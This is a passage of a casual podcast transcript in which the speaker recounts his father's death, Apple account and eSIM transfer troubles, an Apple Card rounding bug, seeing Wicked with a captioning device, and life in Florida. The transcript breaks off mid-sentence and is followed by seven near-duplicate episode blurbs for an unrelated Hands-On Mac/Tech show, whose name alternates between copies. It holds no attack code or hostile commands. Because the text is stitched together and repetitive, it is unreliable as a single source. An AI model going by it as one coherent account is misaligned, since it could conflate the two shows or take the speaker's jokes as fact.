president or former president, but co-founder, founder of, uh, mutually human software in Grand Rapids. [00:35:10] You had my former housemate. [00:35:11] He came out, uh, uh, other kid, uh, other friends from, from middle school, high school made the trick, trick, trick, trick, Jeff and Dan. [00:35:21] It was really great to see so many people under, you know, suboptimal circumstances. [00:35:28] And then of course the whole set of extended family where it's like weddings and funerals, huh? [00:35:33] And then like the obligatory, like, yeah, we should really figure out a way to see each other more. [00:35:37] And it's like true. [00:35:38] And no one doesn't feel that way. [00:35:40] It's just like structurally unlikely the way people's lives work. [00:35:44] Uh, and so there's a sort of, uh, uh, nihilism is definitely the wrong word. [00:35:52] There's a sort of resignation that one has about what even are weddings and funerals and why is it that there's this whole cast of characters in your life that are important or close to you and via affiliation or history in some way. [00:36:12] But that you only see at these really like, like, like, like loud life events where it's a big, the background sound is a huge gong going off that distracts from actually getting to know the people. [00:36:26] If you just, you know, picked them on a random Tuesday and went to lunch, you'd probably learn a lot about the person. [00:36:31] But if it's just in the context of like, you know, like looking at, you know, a tray of sandwiches and having to find something to say, it's all going to be sucked in by the event. [00:36:41] And that's too bad, but that's, that's life, I guess, uh, tasks, you know, H through Z day after I, I had intentionally put off any sort of like looking at stuff, like, like thinking about the logistics, uh, the finances, the legal side, the, all that stuff, life insurance, yada, yada. [00:37:06] Uh, but then, you know, it was a lot of that, right. [00:37:09] For, for the rest of our trip, we were there for, for, for 11 days. [00:37:12] I would say skipping a lot of the minutiae because I, of course, you know, when the, when the, when, when a, when a household had a household or breadwinner passes and they didn't leave instructions, like you got to go and do the forensic analysis to figure out like, what are all the, where is everything? [00:37:32] Right. [00:37:32] That's, that's what it was. [00:37:34] It's all fine. [00:37:36] But the, uh, the tech support son, which is like my, you know, uh, it's not an official designation, but, uh, you know, it's a, it's a role I've stepped into and I feel like I've grown into pretty well. [00:37:48] One of the things that jumped is, all right, so we got a couple of things going on. [00:37:54] One, my mom is in an Apple family organized to buy my dad's Apple ID. [00:37:59] Now what? [00:38:00] All the purchases have been made in general on dad's Apple ID, including their Apple one premiere subscription. [00:38:06] Okay. [00:38:07] Well, you know, next eight, you can imagine my next eight Google searches or coggy searches. [00:38:13] All right. [00:38:14] Well, how do you change head of house or organizer of a family answer? [00:38:19] You cannot. [00:38:19] Okay. [00:38:20] Well, how can I transfer the purchases from an organizer to somebody else in the family? [00:38:28] You cannot. [00:38:28] Okay. [00:38:29] Is there a process by which I can make somebody sort of like a legacy page on Facebook, a legacy [00:38:35] human Apple ID? [00:38:37] No. [00:38:39] Okay. [00:38:40] So what do I do? [00:38:41] And they're like, well, you can call Apple support and they may need a death certificate, [00:38:45] but then you can call them and then they can do some amount of stuff, but some, but you don't [00:38:52] get to know what. [00:38:52] And once you kind of go through that process, the Apple ID gets like locked out or that's a, [00:38:57] that's a risk. [00:38:58] And all the sort of, you know, contingent, other things related to that. [00:39:02] I was like, all right, well, I don't necessarily want to do that as a first resort, but I do got [00:39:09] to figure this out because having just like this extra Apple, having this whole like digital [00:39:14] twin to borrow a, an industry term, continue to be a part of a, you know, an Apple family, [00:39:22] a one password family or all this for years into years, just because the software companies [00:39:27] don't make it logistically possible to die. [00:39:30] Uh, that seems great, you know, like, like, so working through that, you know, like I, I still [00:39:38] don't quite have a solution to that. [00:39:39] I'm just going to get through a couple of billing cycles on all the other stuff first, [00:39:43] before I think too hard about it. [00:39:44] Just kidding. [00:39:45] I've thought really hard about it and I've got a 15 step, you know, uh, set of to do's, [00:39:50] but they're just gonna, I gracefully, mercifully, I mercifully punted them two weeks into the [00:39:56] future. [00:39:56] Uh, I, one of the biggest things other than the Apple family stuff was my, my dad had just [00:40:09] bought a new iPhone 16. [00:40:12] I, and he set it up and all that stuff, but my mom was on an older one, like a 12 pro or a 12 mini or a 13 mini. [00:40:19] And it didn't make sense to leave her with the old phone and the new 16, just like in a drawer, [00:40:30] it made sense to give her the new phone. [00:40:33] Right. [00:40:34] Otherwise that the other phone's old enough. [00:40:36] It's like, I'll just be back in six months or, or, or, you know, like we'll, you'll be wasting [00:40:39] money. [00:40:40] So, and that, you know, just like deleting photos of your dad because of a stupid duplication bug, [00:40:45] having to go through a whole bunch of hoops to, to migrate one phone to the other was like the [00:40:50] next challenge. [00:40:52] Cause here was why it was thorny, right? [00:40:54] If, if all of the bank accounts and multi-factor authentication against banks is almost exclusively [00:41:03] SMS, right? [00:41:04] Cause they didn't get on the bandwagon for a, a T O T P or, you know, like you scan the QR code and you [00:41:11] get an authenticator app to, to show it. [00:41:13] And because they, they certainly don't support pass keys. [00:41:16] Uh, we can't just turn off dad's cellular line until we work through all the financial stuff. [00:41:22] But at the same time, okay. [00:41:25] So like if I'm resetting dad's phone and moving mom's stuff onto dad's phone, then how do I [00:41:30] transfer, how do I get these, how do I make it so that dad's SIM doesn't just disappear? [00:41:35] Cause like last thing I want to do is have to call T-Mobile and explain, and then set up the [00:41:41] old phone from scratch and then have them like, I guess, restart the e-SIM process over the phone [00:41:46] on Christmas, you know, Christmas Eve or whatever. [00:41:51] So I, um, I came up with like a towers of Hanoi solution that I actually kind of liked. [00:41:56] What I did was I transferred dad's SIM from the 16 to mom's 13, call it. [00:42:03] So now she had two SIMs on her phone. [00:42:05] She had her primary SIM and dad's SIM, uh, e-SIM. [00:42:09] Uh, uh, and then I, oh, and the 13 or the 12, whatever has one physical and one e-SIM. [00:42:17] And she fortunately had a physical SIM in there. [00:42:19] So she was able to, to, to receive dad's old e-SIM. [00:42:22] So now the 13 of that stage has a physical, a physical nano SIM and an e-SIM. [00:42:27] And then that allowed me to go to dad's phone, back it up, of course, and all that, and then [00:42:32] wipe it. [00:42:33] Cause it had no cellular plan on it. [00:42:35] And then you set it up new, you set it up for mom. [00:42:40] And during that wizard, you know, you do the direct transfer, they're connected via, you [00:42:45] know, USB cables or whatever. [00:42:46] You set it up for mom. [00:42:49] And she has to, she, it says, Hey, you're ready to transfer your cellular plans. [00:42:56] I'm like, yes. [00:42:56] And then I, it's, I realized it's not, you click, you tap one in it and a check box goes [00:43:02] up next to that number. [00:43:03] And then you check the other one and the check box, the check mark moves. [00:43:07] It's clearly like it doesn't support actually initializing a phone with two SIMs, which means [00:43:14] now it's like, okay, so I'll move for a primary SIM first as part of this direct transfer. [00:43:20] And then the direct transfer, because her router was simultaneously and coincidentally failing, [00:43:25] the direct transfer failed because the wifi timed out. [00:43:30] And when you're in the direct transfer mode between two phones in that setting, you can't [00:43:36] like get to control center and turn off the wifi nick. [00:43:39] So then I've got these two phones that I can clearly tell are timing out in the activation [00:43:43] process while the SIM is moving. [00:43:45] And I'm like, fuck sake. [00:43:47] But it's also like a mesh router and there's three mesh access points throughout the house [00:43:52] and I don't know where they are. [00:43:53] So I, I can't just unplug them and make the SSID go away. [00:43:57] So then I would like throw on my winter coat, it's fucking freezing outside and I start marching [00:44:03] down the street until I can get to like far enough away that they both lose the wifi signal [00:44:09] so that the transfer doesn't fail. [00:44:11] So I, it took 15 houses. [00:44:14] I'm, you know, in, in, in, in, uh, uh, my winter coat, 15 houses, they finally get onto [00:44:21] five G and then the, the, the transfer starts succeeding. [00:44:23] And then I start walking back and then it's just instantly says failed. [00:44:26] So then I get back to the house, start the whole thing over again. [00:44:30] And now of course, mom's primary SIM is like trapped on the first phone or the second, the [00:44:36] new 16, but in setting it up again, it doesn't see it anymore because like it was just at that [00:44:41] perfect moment when all the e-sim juice lands in the 16 or whatever. [00:44:48] So I started the whole process over again. [00:44:50] I, I, I set it up fair and square and then I, I, uh, uh, it all went fine after a few hours. [00:44:59] And then the last thing it does is the 13 or whatever says, Hey, okay, time to delete [00:45:04] me. [00:45:04] And then it's like a, basically two taps and you've deleted the phone that just was the [00:45:08] sender or the old phone in the transfer process. [00:45:11] And I almost habitually clicked it. [00:45:13] And I was like, wait, no, that will delete the SIM, the e-sim. [00:45:16] So click, no, cancel out of that, restart the phone. [00:45:20] And then, and then you can transfer that second SIM back to the first one. [00:45:23] So like when that was just two phones, just moving to e-sims, like again, you know, note [00:45:28] to Apple, like this could probably be made easier. [00:45:31] Uh, it's just, it's edge cases like this, that all software companies are really, really bad [00:45:37] at, uh, especially ones that don't have a great track record of automated testing and stuff [00:45:43] like, so I get it. [00:45:45] I know why it happened. [00:45:47] The other thing that sucked was a dad had an Apple card and if we're not going to have [00:45:52] a phone with dad on it, you don't want, there's no other fucking way to cancel an Apple card. [00:45:57] You have to be on the phone that has the Apple card to cancel it. [00:46:01] But if there's no phone with Fred on it, like that meant I, that forced the issue. [00:46:05] Like I'm not, I'm putting off all the financial stuff, right? [00:46:07] But I had to cancel the Apple card, but I had a balance. [00:46:10] So now I've got to like pay a balance on this Apple card. [00:46:13] And of course the banking connection, he didn't like, like it expired or something. [00:46:18] So I have to go and find the banking information. [00:46:21] I log in, whatever I hit cancel. [00:46:23] And it's, you can cancel the card. [00:46:25] It wants you to pay the balance first. [00:46:27] I tried to pay the exact balance. [00:46:30] It was $218 and 17 cents. [00:46:32] I, and I tried 15 goddamn times. [00:46:35] Uh, I changed to a different bank and it said insufficient balance. [00:46:41] And I was like, does that mean like the checking accounts overdrawn? [00:46:45] So then I'm panicking. [00:46:45] It's like, so I go into the bank account. [00:46:47] I'm like, is it easy overdrawn or what? [00:46:50] Hour of, you know, me retrying and doing this only to realize that there's a fucking bug, [00:46:58] a rounding bug of sub decimal sense. [00:47:02] Because when it said $218 and 17 cents as being the balance owed, it was probably a floating [00:47:09] point under there of $218 and call it 16.51 cents. [00:47:16] Because when I tried to do $218 and 17 cents, it failed. [00:47:21] It's an insufficient balance, which made me think insufficient funds. [00:47:25] But then I had the bright idea to try just one penny less than that. [00:47:28] And it cleared. [00:47:30] It meant that you can't make a payment on the card that is in excess of what is owed on the [00:47:35] card. [00:47:35] And it saw that fraction of a penny as being, oh, hey now, a little too generous. [00:47:40] So an Apple, you know, be good guy, Apple, making sure people can't overpay. [00:47:44] Also, the bad guy, Apple doesn't write tests or use, you know, appropriate data structures [00:47:50] for storing goddamn dollars. [00:47:52] Results in, I can't close this card out. [00:47:56] So eventually, so I got it down to one penny. [00:47:58] And then when it was down to one penny, it let me pay one penny, which is separately hilarious. [00:48:02] So I close the Apple card and then the Apple card says, all right, you're closed now. [00:48:09] The card is removed from all your devices. [00:48:14] Now monitor for the next few months and make payments against anything that shows up in [00:48:18] the statement, right? [00:48:19] Because like, that's how credit cards work. [00:48:20] Things don't post immediately. [00:48:22] I was like, well, I have no idea what was getting charged onto this thing. [00:48:26] What might hit it? [00:48:28] I'd scrolled through a statement. [00:48:31] I had a feeling it wouldn't be bad. [00:48:32] But then of course, like as soon as I wipe that phone, I even restored it. [00:48:36] I restored dad's Apple ID onto another phone because I had a burner phone back when I got [00:48:42] home just to see like, would it, would it, would it, would the, would it, the iCloud sync [00:48:47] work, you know, where your wallet shit just shows up in the new phone just magically after [00:48:52] setup. [00:48:52] And the answer is no, because the Apple card is closed. [00:48:55] So there's no reason to put the Apple card on the new phone. [00:48:58] People would be confused, even though it's just in this removed state of like, watch the [00:49:01] balance, which means now that once the phone gets wiped, there's actually no way to pay [00:49:06] a balance. [00:49:06] If one were to materialize, I guess it would just go to collections. [00:49:10] So now, you know, like, please don't post any transactions to my dad's defunct Apple card. [00:49:16] Cause like, I don't have any fucking way to pay it. [00:49:18] There's card.apple.com. [00:49:19] But like, that's just for downloading statements. [00:49:22] So great job, Apple, like you should really make it easier to die. [00:49:26] Like, fuck, fuck it's sake. [00:49:27] This is a, I realized this has been a lot. [00:49:33] I'm going to move right along. [00:49:37] While we were up, we wanted to just, we needed a break. [00:49:42] It'd been like day after day of the same, you know, emotional and logistical tumult. [00:49:48] Just a real grind. [00:49:49] So we want to go see a movie and like, like, uh, uh, Jeremy had expressed interest in seeing [00:49:53] wicked, which is an autobiography about Ariana Grande as a person, as best I can tell. [00:50:00] Real just, she seems like a piece of shit in real life, but also she got to play one in [00:50:08] a movie. [00:50:08] And so like, uh, it's like one of those things where it's like, well, that Bill Murray just [00:50:12] like plays himself. [00:50:13] And it just so happens that he is such a delightful and interesting person that everything he's [00:50:18] in is always amazing. [00:50:19] So I'm glad she got to play herself. [00:50:21] It seemed well acted, but I knew it was probably just who she is. [00:50:27] Uh, huge fan. [00:50:31] Uh, so anyway, we went to see wicked and all of a sudden, you know, we joked about it beforehand, [00:50:37] but like, I can't, I don't understand lyrics. [00:50:39] I have a thing I've got a, uh, a worm lives inside my brain. [00:50:43] And whenever there's a song playing, uh, that worm starts humming and I can't hear the lyrics [00:50:49] to the song. [00:50:50] I can't understand or discriminate where the words are starting and stopping. [00:50:53] I can't tell what is being said. [00:50:56] And if I can barely make it out, then I'm so overwrought and focusing on what's being said. [00:51:01] Then, then I kind of lose the thread. [00:51:02] Like I'll hear the individual words if I really focus, but then not understand what is being [00:51:08] communicated through lyrics. [00:51:10] At the same time, you go to a musical, you go to like, when I went to Hamilton, this was [00:51:15] like extremely clear. [00:51:16] It's like, Oh, I, I put, we went to Hamilton, uh, when, when Hamilton was still cool and not [00:51:21] seen as some sort of, you know, uh, uh, white supremacist whitewashing by putting BIPOC [00:51:27] people in, in these roles and whatnot, 2020 was a hell of a year, uh, when we went to [00:51:33] Hamilton, I got, they got through the first number and I was like, that was very impressive. [00:51:38] I, I appreciate the, this tonal, you know, interesting take. [00:51:43] This is like very like, like skillfully and artfully, uh, done. [00:51:47] Uh, and then, uh, you know, then they go straight into another song and I turned to Becky. [00:51:54] He was like, is there, is there no talking in this one? [00:51:56] Is there zero spoken dialogue in this? [00:52:00] And it turned out that the answer was yes. [00:52:02] And I was like, I don't understand anything. [00:52:04] And so, uh, when we went to Hamilton, which I'd paid a lot of money to go to, uh, I walked [00:52:09] to the lobby in the middle of the show. [00:52:12] And then I ordered like two thingies of wine, uh, which I paid a lot of money for the wine. [00:52:20] And then I got back to the seat, threw back both wines and fell asleep. [00:52:23] So that was Hamilton for me. [00:52:26] So here I am at wicked and we're in the first little ditty. [00:52:28] And I'm like, I don't understand any of these fucking words. [00:52:33] I don't, I don't know what's happening. [00:52:35] And I've got to worry that this is going to be a song heavy movie, which it was. [00:52:40] So I was like, you know what, like normally I'd be embarrassed to do this, [00:52:44] but I'm going to go to the front and say, like, I'm hard of hearing. [00:52:49] Can I have a subtitle machine dingus? [00:52:52] I knew that theaters had them. [00:52:55] I didn't really know how they worked or what they were, if they were any good. [00:52:58] But I was like, you know, for the sake of science and technology, I'm going to try the [00:53:02] subtitle dingus. [00:53:04] So I went to the front, I went to the little, like, you know, whatever ticket booth, and [00:53:08] they handed me a gooseneck snake thing where the bottom is like, it's like a, a drill that [00:53:17] would bore a tunnel, but it goes in the cup holder. [00:53:20] So it's like a cup holder drill and it screws in. [00:53:23] So it goes in the cup holder. [00:53:25] You screw it in to secure it. [00:53:27] And then there's a long gooseneck, a too long, in my opinion, gooseneck. [00:53:31] It's like probably two feet. [00:53:34] If you don't know the term gooseneck, like, like, like, like bendy, like, like, you know, [00:53:42] relatively thick, not a cable, but like a, like a pole that is pliable. [00:53:48] So you can bend it in all sorts of different directions to kind of adjust it. [00:53:53] And then on the top, it was a, a device that had a blinder on the top so that other people [00:53:59] weren't getting a whole bunch of illumination and seeing subtitles and a radio system in [00:54:05] the center, as well as like a kind of internal projector unit. [00:54:08] And so it was very interesting to see how these worked. [00:54:11] You would, and, and, and honestly, because I was uninterested in the Ariana Grande story, [00:54:16] I was mostly just futzing with, and it gave me something to do for the three and a half [00:54:23] hours. [00:54:23] By the way, I had been told that there was an intermission and I was told that because somebody [00:54:29] had in the game of telephone and said they broke it up into two parts. [00:54:32] So like I went in expecting an intermission and then we're like three hours in, it's almost [00:54:37] like 11 fucking o'clock. [00:54:38] And I'm like, I got to pee, but like, I hear there's an intermission. [00:54:41] How late are we going to be here? [00:54:44] So that was, that kept me busy too. [00:54:46] I had something else to do, but anyway, the, the, the subtitle machine was really interesting [00:54:50] because as you look at it and once you get it configured, right, you realize like while [00:55:00] I was walking down the, the, the corridor, it just said, Hey, you know, go inside the theater [00:55:06] or whatever. [00:55:07] When you go in the side of theater, it'll just start showing up. [00:55:09] And when I looked inside the theater, just at the, at the edge of the theater, it was like, [00:55:14] malfunctioning. [00:55:15] It said like something about an, a reader. [00:55:16] And then I realized, Oh, what's happening here is, and this is really one of those kind [00:55:20] of old school, cool technology, you know, innovations where they couldn't just use a digital system [00:55:27] for this per se. [00:55:28] Like a protocol, right? [00:55:30] Like if you were to build this today, these would be like lithium ion battery devices that [00:55:34] would have some charging dock and some kind of software that ran on, like on top of some [00:55:38] minimal Linux stack. [00:55:40] And then it would use the, the, the theater's wifi to send subtitles, which would require [00:55:46] all of this configuration, right? [00:55:47] Like, okay, now punch in on the touch screen on your subtitle device, like which theater, [00:55:52] which theater you're in and which movie time. [00:55:54] And we'll play it. [00:55:55] Right. [00:55:55] But instead, this was just like a short wave radio system. [00:55:58] So you'd be inside the theater and every theater you, you've never even noticed this. [00:56:03] Probably you're in the theater and you're watching a movie. [00:56:06] And the subtitle machine is just receiving these waves that you can't see because the projector [00:56:13] area, I presume is just always blasting out radio waves of the current line of dialogue. [00:56:20] You just didn't have the device to see it. [00:56:22] And so I got the thing screwed in with Jeremy's help because I'm not very handy and I got to [00:56:29] actually follow along the rest of the movie, which makes me an authority on, on, on being [00:56:34] able to say not that great. [00:56:35] Not very interesting. [00:56:37] I I'm on the Kinsey scale. [00:56:40] I'm all the way to hetero male, which means musical theater is not, doesn't come naturally [00:56:48] to me in terms of being like something that gets me real excited deep down there. [00:56:53] Uh, sorry if that's you, I'm just saying it's not it anyway. [00:57:02] Uh, yeah. [00:57:03] So that was, that was pretty cool. [00:57:05] Uh, other life stuff. [00:57:13] Well, the, the version, I guess tying a bow around the, uh, the trip up there and all [00:57:21] that realizing I've gone an hour on it now. [00:57:25] People, when you move from the Midwest United States to Florida and you do it because you [00:57:35] feel like the Midwest kind of sucks, you know, it's cold. [00:57:38] A lot of the time, uh, a lot of the rest belt States are, well, they're called rust belt. [00:57:45] They're dying economically. [00:57:46] There's less economic activity. [00:57:48] There's less new stuff. [00:57:50] There's less vibrancy. [00:57:51] Uh, when you move from the Midwest to Florida and you have a great setup there and lots of sunshine [00:58:00] and, and, and, and stuff to do people react in very different ways. [00:58:08] No one just says, Oh my God, that's so great for you. [00:58:10] I'm really, really happy for you. [00:58:11] Wow. [00:58:12] That sounds awesome. [00:58:12] I mean, some people kind of do, uh, a lot of people are either jealous or in some state [00:58:20] of denial or, or frustration by it, you know, like you feel abandoned or whatnot. [00:58:27] I think, I think the people who genuinely think the Midwest is better and the people who are [00:58:34] jealous, both end up asking the same question of us Midwestern expats. [00:58:41] And that, that question is, do you regret it yet? [00:58:44] God, I've been down here for four years. [00:58:48] Right. [00:58:49] And here I am. [00:58:50] My dad just died. [00:58:52] Just put on a funeral, you know, staying at a Hampton Inn. [00:58:57] Huh? [00:58:59] A Hampton Inn where like, it was a great experience. [00:59:02] The staff were really great, but like they had a desk in the laundry room that was never screwed [00:59:07] in or, or, or secured properly. [00:59:08] So I set down my brand new MacBook pro and a Coke, a can of Coke. [00:59:13] And then it just collapsed all of it all at once to the floor. [00:59:17] So my MacBook got soaking wet and Coke. [00:59:19] And also the, the unibody enclosure got super scraped up. [00:59:23] And, uh, the, the day before the funeral, I was all, you know, in a lot of neck pain from, [00:59:29] from the fall and the general manager still hasn't gotten back to me. [00:59:33] It was gray outside. [00:59:35] It was cold. [00:59:37] You know, and I, and I was struggling like for activities and things we could do as a [00:59:42] family and, and settled. [00:59:43] Uh, and the best, most entertaining thing to do was the Ariana Grande story. [00:59:50] And they ask, do you regret it yet? [00:59:52] Like totally just straight. [00:59:56] Every time we go back, I thought like, this is going to be the trip. [01:00:00] I go back and I don't have a single person ask me that, but then it came up relative at the [01:00:06] wake. [01:00:09] And I was like, man, thank you for asking. [01:00:11] You know, I think about it a lot. [01:00:14] I love Michigan. [01:00:14] Michigan's beautiful in the summers, but inside I'm like, come on. [01:00:17] No, I don't regret it. [01:00:19] Yes. [01:00:20] I'm already homesick. [01:00:21] Uh, it's fucking awesome here. [01:00:23] I'm not going to lie. [01:00:24] Like I live in goddamn paradise. [01:00:26] I don't know why more people don't do it. [01:00:28] I don't, you know, politics are part of the equation for a lot of folks, uh, politics and [01:00:35] policies. [01:00:36] Uh, and I, and I get it, but man, like I am so much fucking happier here just on a [01:00:42] day-to-day basis. [01:00:43] Like you, you blind out all of the sort of like metal layer stuff and just like my meat [01:00:48] bag gets a lot more sun and a lot more movement and a lot more just stuff going on down here. [01:00:53] And so, no, I don't regret it yet. [01:00:54] Uh, but if I ever do, I'll let you know, I've got a podcast, so I definitely will. [01:01:02] Uh, one thing I do regret is eating so, or is, uh, uh, drinking so little dairy in my [01:01:07] twenties because I have become extremely lactose intolerant. [01:01:12] Uh, so I don't have any lactase to the point where even if I drink lactaid, like, like what [01:01:19] they call like lactose free milk, but, but actually is lactose full milk with also lactase enzyme [01:01:25] added to it so that your tummy will process it. [01:01:28] Even when I drink that, I drank 20 grams two nights ago and the whole next day I was [01:01:33] wrecked. [01:01:33] That's not a lot of fucking milk. [01:01:35] Uh, now you call that an allergy or an intolerance. [01:01:39] Um, but like if I want cereal, like it's going to happen. [01:01:42] So sure you can pathologize it, but I was like, I, I am making a trade with my future self. [01:01:48] Like I'm going to put up with some indigestion so that I can have this deal. [01:01:52] Okay. [01:01:53] We're in, uh, if I had a peanut allergy to the point of like anaphylactic shock, I'd be [01:02:01] having the same negotiation. [01:02:03] I would just probably not take the deal most of the time. [01:02:07] Uh, anyway, I finally caved. [01:02:11] Cause like I talking about politics, I am politically, um, unaccepting intolerant of, [01:02:19] uh, milk alternatives. [01:02:22] Cause it's not milk. [01:02:24] People call almond milk, milk. [01:02:26] That's not milk. [01:02:27] That's just squeezed almond. [01:02:29] And like the amount of water that goes into making an almond is insane. [01:02:32] And so the, whatever almond milk is must be not, not really great from a sustainability [01:02:37] perspective. [01:02:38] And it's just, it's not, it's not what it says on the 10. [01:02:41] It shouldn't be allowed to be called milk. [01:02:43] It's like that fake egg product called just egg. [01:02:45] I was like, that's no, it's unjust egg. [01:02:48] This is not an egg. [01:02:49] Uh, so I, I, I caved and I bought Kirkland dairy-free oat beverage is what it says in the [01:03:00] box and oat milk. [01:03:02] And I had that last night and I'm still mad at myself about it, but here we are. [01:03:08] I'm going to say that's, I'm going to cap it at an hour of life updates. [01:03:16] I knew it would be life heavy. [01:03:18] Um, but, and because it's a heavy period of life right now, but if you're curious after all [01:03:24] of this shit and all the storytelling and all me getting stuff off my chest, I'm actually [01:03:28] doing great. [01:03:29] I'm processing things. [01:03:30] Love my dad dearly. [01:03:31] Um, I, I've taken the moments, you know, to be quiet and still and to spend effort and [01:03:44] time genuinely reflecting and going through old things and, you know, letting feelings happen [01:03:51] and letting those memories come by and doing other
On this episode of Hands-On Mac, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
On this episode of Hands-On Tech, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
On this episode of Hands-On Mac, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
On this episode of Hands-On Mac, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
On this episode of Hands-On Mac, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
On this episode of Hands-On Tech, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
On this episode of Hands-On Mac, Mikah answers questions about what to do with old electronics, extracting photos out of downloaded files and maintaining the original photo names, how to properly manage your phone's battery, and a question from a listen about the best way to manage their router setup! Kelli came across some old electronics her father had years ago! She thinks they could be worth something but wonders if she should recycle them instead. Ray has their iPhone wirelessly charging at night while on Do Not Disturb. However, it randomly makes a sound at night! How can he get his phone to stop making that noise? Sean just downloaded their Google photos to back them up on an external drive. How can he keep the photos' original names when he extracts the files? Dan wonders how to manage their phone's battery life best when they keep it plugged in most of the time. Alan has three routers throughout his household in his home network. When he goes to different points in the house, he has to change the SSID to the router closest to where he is. Is there a simpler way of doing this before going to a Mesh router setup? Don't forget to send in your questions for Mikah to answer during the show! hot@twit.tv Host: Mikah Sargent Download or subscribe to Hands-On Tech at https://twit.tv/shows/hands-on-tech Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsor: cachefly.com/twit
